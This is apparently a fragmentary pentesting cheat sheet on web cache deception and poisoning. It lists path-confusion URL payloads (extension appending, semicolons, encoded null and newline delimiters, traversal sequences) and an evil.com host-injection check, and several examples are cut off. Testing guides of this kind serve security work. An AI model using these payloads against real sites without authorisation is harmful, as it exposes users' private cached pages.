Web Cache
Web cache deception and web cache poisoning
Last updated
Web cache deception and web cache poisoning
Last updated
X-Cache: HIT
Generic caches (Varnish, Squid)
Response served from the server or proxy cache.
CF-Cache-Status: HIT
Cloudflare (CDN)
Response served from Cloudflare's cache.
X-Cache: HIT or CF-Cache-Status: HIT (depending on the cache used)
Cache-Control: public -> That means anyone could potentially retrieve this response.
Response :
This page should not be put in cache
Try adding .jpg / .js / .css
Normal Request
The response is
Try to add cacheable extension (For example .js / .css / .jpg, etc.)
The response is
If the Cf-Cache-Status / X-Cache response the request with HIT not MISS or Error. And then try to open the url in incognito mode
Add ; before the extension (For example ;.js / ;.css / ;.jpg, etc.)
The response is
If the Cf-Cache-Status / X-Cache response the request with HIT not MISS or Error. And then try to open the url in incognito mode
www.example.com/profile.php/.js
www.example.com/profile.php/.css
www.example.com/profile.php/test.js
www.example.com/profile.php/../test.js
www.example.com/profile.php/%2e%2e/test.js
Use lesser known extensions such as .avif
/profile isn’t getting cached... but /assets/* is
Matrix variales use of semicolon to add parameters
/user;params/home -> /user/home
/Myaccount;a.js -> MyAccount
Response format specifiers use dot to render views
/MyAccount -> Default view: myaccount.html.erb
/MyAccount.css -> view: myaccount.css.erb
/MyAccount.aaa -> Default view: myaccount.html.erb
/MyAccount.ico -> Default view: myaccount.html.erb
Encoded null as delimiter
/MyAccount%00a.js -> /MyAccount
Encoded new line as delimiter if rewrite is enabled
/user/MyAccount%0a.js -> /account/MyAccount
/%68%65%6C%6C%6F -> /hello
/hello%2Fworld%2Ehtml -> /hello/world.html
/hello/../world -> /world
/hello\world -> /hello/world
/MyAccount$%2F%2E%2E%2Fstatic%2Fwcd -> /MyAccount/../static/wcd
Front End - Path Normalization : /static/wcd
Back End - $ is delimiter : /Myaccount
For example, this is the case whe CloudFront/Azure/Imperva is combined with Tomcat
Look for evil and X-Cache: HIT / CF-Cache-Status: HIT in the response
Look for evil.com in the response
If the response contains X-Cache: HIT / CF-Cache-Status: HIT and the returned page is malicious or incorrect, it means the cache has been poisoned.
If the server sends a response with X-Cache: HIT / CF-Cache-Status: HIT and the page corresponds to a malicious page (e.g., an error page or an admin page), it is possible that the cache has been poisoned with an incorrect response.
Example 2:
Right-click on a request that you want to investigate and click "Guess headers"
I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.
Credits:
See below for more information - Sourcce:
The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.
